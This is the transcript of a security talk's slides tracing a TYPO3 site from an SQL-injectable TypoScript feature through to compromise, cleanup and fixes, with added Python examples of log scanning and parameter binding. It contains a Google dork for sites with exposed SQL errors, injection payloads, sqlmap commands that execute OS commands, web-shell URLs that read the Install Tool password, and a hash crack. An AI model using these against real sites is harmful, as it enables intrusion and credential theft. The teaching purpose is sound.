
Diary of a Hack

Telling the story of how websites are hacked: starting from day one with creating and deploying a feature that contains a vulnerability, and ending with cleaning up the website after it was taken over by attackers.


Helmut Hummel

April 22, 2016

Transcript

  1. Diary of a Hack: Vulnerabilities and Exploits. Helmut Hummel <info@helhum.io>, 22.04.2016 (slide template footer: "Inspiring people to share", "Vulnerabilities and Attacks")

  2. @helhum

  3. Security

  4. http://typotic.com/uploads/posts/3427/funny-dude-this-is-boring-01.jpg

  5. http://www.pxleyes.com/images/contests/teddy-bears-2/fullsize/Story-time-507bf54d589a1_hires.jpg

  6. http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

  7. http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

  8. http://i.telegraph.co.uk/multimedia/archive/02210/squirrel_2210134b.jpg

  9. https://xkcd.com/327/

  10. http://www.kitploit.com/2013/06/john-ripper-v180-fast-password-cracker.html

  11. https://ilifejourney.files.wordpress.com/2011/11/spaghetti-mess.jpg

  12. http://img3.wikia.nocookie.net/__cb20121122132016/villains/images/f/fb/Janitor_2.jpg

  13. http://i.livescience.com/images/i/000/029/390/i02/shutterstock_105432542.jpg?1343404330

  14.

  15. Diary of a Hack

  16. Diary of a Hack: Day 1 - Implementing a feature

  17. Diary of a Hack
    lib.sqliSimple = CONTENT
    lib.sqliSimple {
      table = tt_content
      # stdWrap applies "data" first and "wrap" second: the GET/POST value colPos
      # is inserted verbatim at the "|" of the wrap, so the request controls the
      # raw WHERE clause (this is the vulnerable version).
      select.where.wrap = colPos=|
      select.where.data = GP:colPos
    }

  18. Diary of a Hack
    lib.sqliSearch = CONTENT
    lib.sqliSearch {
      table = tt_content
      # Same pattern for the search term: the quotes around it belong to the wrap,
      # so a quote in the request value closes the string and the rest is parsed as SQL.
      select.where.wrap = header like '%|%'
      select.where.data = GP:search
    }
  19. Diary of a Hack: Day 2 - Testing the feature

  20. Diary of a Hack

  21. Diary of a Hack
    Debug settings switched on for testing (keys of typo3conf/LocalConfiguration.php). Left enabled on the live site, SYS/sqlDebug and SYS/displayErrors print failing queries, including their SQL, to every visitor, which is what Day 4 builds on:
    'BE/debug' => '1'
    'FE/debug' => '1'
    'SYS/devIPmask' => '*'
    'SYS/displayErrors' => '1'
    'SYS/sqlDebug' => '1'
    'SYS/exceptionalErrors' => '28674'

  22. Diary of a Hack

  23. Diary of a Hack
    'DB/username' => 'root'
    (the website connects to the database as the MySQL superuser)

  24. Diary of a Hack

  25. Diary of a Hack: Day 3 - Distraction

  26. Diary of a Hack

  27. Diary of a Hack: Day 4 - Attraction

  28. Diary of a Hack
    https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
    (a search for TYPO3's exec_SELECTquery debug output combined with MySQL's syntax-error message lists sites that print their failing queries to visitors)

  29. Diary of a Hack: Day 5 - Exploitation

  30. Excursion - SQLi

  31. Excursion - SQLi
    SELECT * FROM tt_content WHERE colPos = 0

  32. Excursion - SQLi
    'SELECT * FROM tt_content WHERE colPos = ' . $_GET['colPos']

  33. Excursion - SQLi

  34. Excursion - SQLi
    'SELECT * FROM tt_content WHERE colPos = ' . $_GET['colPos']

  35. Excursion - SQLi
    With $_GET['colPos'] set to "0 or hidden = 1" the concatenation yields:
    'SELECT * FROM tt_content WHERE colPos = 0 or hidden = 1'
  36. Disclaimer

  37. Don't do this at home!

  38. (unless you have written permission)

  39. Diary of a Hack
    $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos'
    GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N]
    sqlmap identified the following injection points with a total of 30 HTTP(s) requests:

  40. The power of MySQL

  41. Diary of a Hack
    $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos' \
        --os-cmd='ls -al'
    (sqlmap's --os-cmd drops a small PHP stager into the web root through MySQL's file-writing functions; that needs a database account with the FILE privilege, here root from slide 23, and a web root the database server can write to)

  42. Diary of a Hack

  43. Diary of a Hack
    http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL
    http://security.dev/typo3/sysext/install/Start/Install.php
    http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php

  44. Diary of a Hack
    $ john pw
    Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])
    password         (dummy)
    guesses: 1  time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015)  c/s: 900  trying: 123456 - fishing

  45. Diary of a Hack

  46. Diary of a Hack: Day 5 - Discovery

  47. Diary of a Hack: Discovery
    • Take site offline!
    • seriously
    • I mean it

  48.

  49. Diary of a Hack: Day 6 - Analysis

  50. Diary of a Hack: Analysis
    • Make a backup of current state (files, DB, logs)
    • Search all logs for "suspicious" entries
    • Find point of entry (security issue)
    • If in doubt: get help
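For the "search all logs for suspicious entries" step, here is an added example (not code from the talk or from TYPO3) that scans access-log lines for the traces the attack in this deck would leave: sqlmap's user agent and SQL syntax or quotes in query parameters (slide 39), a `cmd=` parameter on a PHP file that is not a known entry point, such as the dropped `tmpbrsru.php` stager (slide 43), requests to the Install Tool under `typo3/sysext/install/` (slide 43), and 500 responses caused by SQL errors (slide 28). The log lines, IP addresses and timestamps are constructed and assume the Apache combined log format; the rules are deliberately simple and will produce false positives on real traffic, so treat hits as leads to inspect, not verdicts.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines (assumption: this log layout); the
# paths mirror what the deck shows: the sqlmap probe on colPos, the dropped
# tmpbrsru.php stager and the Install Tool. IPs and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jun/2015:10:41:02 +0200] "GET /index.php?id=37&colPos=0 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jun/2015:10:52:17 +0200] "GET /index.php?id=37&colPos=0%20AND%201%3D1 HTTP/1.1" 200 8123 "-" "sqlmap/1.0-dev"
198.51.100.9 - - [04/Jun/2015:10:52:18 +0200] "GET /index.php?id=37&colPos=0%27 HTTP/1.1" 500 512 "-" "sqlmap/1.0-dev"
198.51.100.9 - - [04/Jun/2015:10:58:40 +0200] "GET /tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jun/2015:10:59:03 +0200] "GET /typo3/sysext/install/Start/Install.php HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jun/2015:11:03:11 +0200] "GET /index.php?id=37&search=teddy HTTP/1.1" 200 7990 "-" "Mozilla/5.0"
"""

# One combined-format line: ip ident user [time] "method target proto" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# SQL keywords, quotes and comment openers inside a decoded parameter value
SQL_TOKENS = re.compile(r"(?i)\b(and|or|union|select|sleep|benchmark)\b|['\"]|--|/\*")

# Scripts that legitimately receive requests on this (assumed) TYPO3 site
KNOWN_ENTRYPOINTS = {"/index.php", "/typo3/index.php"}


def suspicious(line):
    """Return the list of reasons a log line looks like attack traffic ([] if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    url = urlsplit(m["target"])
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    # 1. scanner fingerprint in the user agent (slide 39)
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user agent")
    # 2. SQL syntax or quotes in any query parameter, e.g. colPos=0 AND 1=1
    for name, values in params.items():
        if any(SQL_TOKENS.search(v) for v in values):
            reasons.append(f"sql tokens in parameter {name}")
    # 3. a cmd parameter on a PHP file that is not a known entry point: web shell (slide 43)
    if url.path.endswith(".php") and url.path not in KNOWN_ENTRYPOINTS and "cmd" in params:
        reasons.append(f"command execution via {url.path}")
    # 4. the Install Tool being opened from outside (slide 43)
    if url.path.startswith("/typo3/sysext/install/"):
        reasons.append("Install Tool access")
    # 5. database errors surfacing as server errors (slide 28)
    if m["status"] == "500":
        reasons.append("server error response")
    return reasons


def scan(log_text):
    """Return [(line_number, reasons), ...] for every flagged line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        reasons = suspicious(line)
        if reasons:
            hits.append((number, reasons))
    return hits


if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```

Rule 3 is the one that catches the post-exploitation phase cheaply: any request with a `cmd` parameter to a PHP file the site does not ship is worth a look, and a list of shipped entry points is easy to keep for a TYPO3 install. Correlating hits by client address (here all of 198.51.100.9) then gives the timeline the analysis step asks for.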
  51. Diary of a Hack: Day 7 - Fix

  52. Diary of a Hack
    lib.sqliSimple = CONTENT
    lib.sqliSimple {
      table = tt_content
      # Marker form: TYPO3 quotes and escapes the marker value before substituting
      # ###colPos###, so the request value can no longer change the shape of the
      # WHERE clause.
      select.where = colPos=###colPos###
      select.markers {
        colPos.data = GP:colPos
      }
    }

  53. Diary of a Hack
    lib.sqliSearch = CONTENT
    lib.sqliSearch {
      table = tt_content
      select.where = header like ###search###
      select.markers {
        search.data = GP:search
        # the % wildcards are added by the wrap, then the whole value is quoted
        search.wrap = %|%
      }
    }
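The following is an added example, not code from the talk or from TYPO3. It replays the excursion of slides 31 to 35 and the marker fix of slides 52 and 53 in Python against an in-memory SQLite table named tt_content with constructed rows, so the vulnerable and the fixed behaviour can be compared on the same data. The `AND hidden=0` appended to every query stands in for the enable fields TYPO3's CONTENT object adds automatically; the bound-parameter functions are the analogue of the ###marker### form, and the LIKE escaping in `safe_search` goes one step beyond the TypoScript fix by treating `%` and `_` inside the search term literally.

```python
import sqlite3

# Constructed sample rows modelled on TYPO3's tt_content (not real site data):
# colPos is the column slot, hidden=1 marks records that must never be shown.
ROWS = [
    (1, 0, 0, "Welcome"),
    (2, 1, 0, "Sidebar"),
    (3, 0, 1, "Unpublished draft"),
    (4, 0, 1, "Internal pricing"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tt_content (uid INTEGER, colPos INTEGER, hidden INTEGER, header TEXT)")
    conn.executemany("INSERT INTO tt_content VALUES (?, ?, ?, ?)", ROWS)
    return conn


DB = make_db()


def run(sql, params=()):
    """Execute a query against the sample table and return the uid column."""
    return [row[0] for row in DB.execute(sql, params)]


def vulnerable_by_colpos(colpos):
    # select.where.wrap = colPos=|  with  select.where.data = GP:colPos:
    # the raw request value is spliced into the statement, then the enable
    # fields (here: AND hidden=0) are appended. With "0 or hidden = 1" the OR
    # takes precedence over the appended AND, so hidden rows come back.
    where = "colPos=" + colpos
    return run("SELECT uid FROM tt_content WHERE " + where + " AND hidden=0 ORDER BY uid")


def vulnerable_search(search):
    # select.where.wrap = header like '%|%'  with  select.where.data = GP:search:
    # the quotes belong to the wrap, so a quote in the request value closes the
    # string literal and everything after it (including a -- comment that
    # swallows the appended enable fields) is parsed as SQL.
    where = "header like '%" + search + "%'"
    return run("SELECT uid FROM tt_content WHERE " + where + " AND hidden=0 ORDER BY uid")


def safe_by_colpos(colpos):
    # Analogue of select.where = colPos=###colPos###: the value is bound as a
    # parameter, so "0 or hidden = 1" is compared as one literal value and cannot
    # alter the WHERE clause (in real code, additionally cast colPos to int).
    return run("SELECT uid FROM tt_content WHERE colPos=? AND hidden=0 ORDER BY uid", (colpos,))


def safe_search(search):
    # Analogue of ###search### with search.wrap = %|%: the wildcards are added
    # around the bound value. Beyond the TypoScript fix, % and _ inside the user
    # input are escaped so they match literally instead of acting as wildcards.
    escaped = search.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return run(
        "SELECT uid FROM tt_content WHERE header LIKE ? ESCAPE '\\' AND hidden=0 ORDER BY uid",
        ("%" + escaped + "%",),
    )


if __name__ == "__main__":
    payload = "0 or hidden = 1"                          # the value from slide 35
    print("vulnerable colPos:", vulnerable_by_colpos(payload))   # [1, 3, 4]: hidden rows leak
    print("fixed colPos:     ", safe_by_colpos(payload))         # []
    payload = "%' or hidden = 1 -- "                     # closes the quote, comments out the rest
    print("vulnerable search:", vulnerable_search(payload))      # [1, 2, 3, 4]
    print("fixed search:     ", safe_search(payload))            # []
```

Two details carry over to the TypoScript fix: the marker value is quoted as a whole, so the request value can only ever be a value, and the wildcards must be added by the wrap rather than typed by the user, which is why `search.wrap = %|%` sits inside `select.markers` and not on `select.where`.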
  54. Diary of a Hack: Fix
    • Close security issue in Code/ Extension/ Core
    • Restore from backup
    • Or if you really know what you are doing: cleanup installation
    • Go online again
    • Plan improvements (education, monitoring, …)
  55. Diary of a Hack: Day 8 - Improve

  56. Security of Web Applications: Lessons learned
    • Development/ Testing Environment
    • Deploy to Production
    • Least privilege
    • There is no Software without bugs. Be prepared!

  57. Diary of a Hack: Best Practice
    • Operations
    • Regular updates
    • Backups
    • Monitoring
    • Development
    • Peer Reviews (TypoScript, Code, Templates)
    • (automated) Tests
    • Focus
    • Education
    • Allocate time for all of the above

  58. Questions?

  59. Security of Web Applications: Resources
    • http://docs.typo3.org/typo3cms/SecurityGuide/
    • http://sqlmap.org
    • http://www.openwall.com/john/
    • https://www.owasp.org/

  60. Thank you!

  61. @helhum http://helhum.io info@helhum.io